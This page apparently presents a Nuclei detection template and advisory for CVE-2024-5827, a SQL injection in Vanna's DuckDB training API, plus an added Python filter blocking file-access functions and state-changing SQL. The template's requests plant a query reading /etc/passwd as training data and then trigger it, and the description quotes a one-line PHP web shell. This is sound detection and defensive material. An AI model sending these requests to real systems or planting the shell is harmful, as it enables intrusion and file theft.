Vanna - SQL injection
ID: CVE-2024-5827
Severity: critical
Author: olfloralo,nukunga,harksu,nechyo,gy741
Tags: cve,cve2024,vanna,sqli
Description
Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim’s file system, such as backdoor.php with contents <?php system($_GET[0]); ?>. This can lead to command execution or the creation of backdoors.
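The flaw is that SQL submitted as training data is later replayed by generate_sql. As an added defensive example (not Vanna's own code), the filter below is the kind of check a deployer could put in front of the training endpoint: it accepts only a single read-only SELECT/WITH statement and rejects the file-reading function used in the template on this page together with other file or state-changing identifiers. The function names and the set contents are assumptions chosen for the illustration.

```python
import re

# Added example, not Vanna's own code: a server-side filter for SQL submitted
# as training data. The set members are assumptions for this illustration;
# pg_read_file is the function used in the template on this page, the others
# are DuckDB surfaces that read or write the file system or change state.
FILE_ACCESS_FUNCTIONS = {
    "pg_read_file", "read_csv", "read_csv_auto", "read_text", "read_blob",
    "read_parquet", "read_json", "glob",
}
STATE_CHANGING_KEYWORDS = {
    "copy", "export", "attach", "install", "load", "insert", "update",
    "delete", "create", "drop", "alter", "pragma", "set",
}

# Comments and string literals are removed first so they cannot hide a keyword
# or smuggle a second statement past the checks below.
_STRIP = re.compile(r"--[^\n]*|/\*.*?\*/|'(?:[^']|'')*'", re.S)
_IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def strip_sql(sql: str) -> str:
    """Blank out comments; collapse every string literal to an empty ''."""
    return _STRIP.sub(lambda m: "''" if m.group(0).startswith("'") else " ", sql)


def validate_training_sql(sql: str) -> tuple[bool, str]:
    """Accept only a single read-only SELECT/WITH statement.

    Returns (ok, reason) so the caller can log why a submission was refused.
    """
    body = strip_sql(sql).strip().rstrip(";").strip()
    if not body:
        return False, "empty statement"
    if ";" in body:
        return False, "multiple statements"
    idents = [t.lower() for t in _IDENT.findall(body)]
    if not idents or idents[0] not in ("select", "with"):
        head = idents[0].upper() if idents else "<none>"
        return False, f"statement must start with SELECT or WITH, got {head}"
    flagged = sorted(set(idents) & (FILE_ACCESS_FUNCTIONS | STATE_CHANGING_KEYWORDS))
    if flagged:
        return False, "disallowed identifier(s): " + ", ".join(flagged)
    return True, "ok"
```

The CVSS vector on this page (PR:N) shows the training endpoint requires no privileges; a filter like this narrows what a submission can make generate_sql reproduce but is no substitute for authenticating that endpoint.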
YAML Source
id: CVE-2024-5827

info:
  name: Vanna - SQL injection
  author: olfloralo,nukunga,harksu,nechyo,gy741
  severity: critical
  description: |
    Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim's file system, such as backdoor.php with contents `<?php system($_GET[0]); ?>`. This can lead to command execution or the creation of backdoors.
  reference:
    - https://huntr.com/bounties/a3f913d6-c717-4528-b974-26d8d9e839ca
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5827
    - https://huntr.com/bounties/e4e64a51-618b-41d0-8f56-1d2146d8825e
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-5827
    cwe-id: CWE-434
    epss-score: 0.00043
    epss-percentile: 0.09524
  metadata:
    verified: true
    max-request: 2
    fofa-query: body='vanna.ai'
  tags: cve,cve2024,vanna,sqli

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /api/v0/train HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"sql":"SELECT pg_read_file('/etc/passwd', 0, 1000);"}

    matchers:
      - type: word
        words:
          - 'id":'
        internal: true

  - raw:
      - |
        GET /api/v0/generate_sql?question=What%20is%20the%20content%20of%20the%20first%201000%20characters%20of%20the%20%2Fetc%2Fpasswd%20file? HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - 'application/json'
# digest: 4a0a00473045022038285de0a19541342be2fb2f9ebe6063ea9c4e9eeb0cfbae4b9daa6c67b14114022100f0c51c2770c99422e8693095a6e98ce2f74fd12ab322a71dfd678ef0130d854a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This Nuclei template detects the vulnerability in a web application by sending the two requests above and checking the responses for the listed patterns. Run it with the Nuclei tool against the target URL:
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-5827.yaml"